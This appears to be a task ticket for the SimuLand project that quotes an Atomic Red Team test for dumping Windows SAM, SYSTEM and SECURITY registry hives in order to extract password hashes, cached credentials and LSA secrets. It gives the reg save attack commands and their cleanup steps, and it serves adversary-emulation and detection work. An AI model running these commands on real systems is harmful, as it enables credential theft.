[SD-ART-T1003.002-01] Registry dump of SAM, creds, and secrets - SimuLand Request

[Cyb3rWard0g]

Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets

Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul

Tasks:

• Create an issue in SimuLand GitHub Repo with a request to run this atomic test
• Start collaboration with contributors to SimuLand and make sure someone is assigned to the creation of the environment.
• Close ticket and move it to done once the issue is create in the other project and someone is assigned to it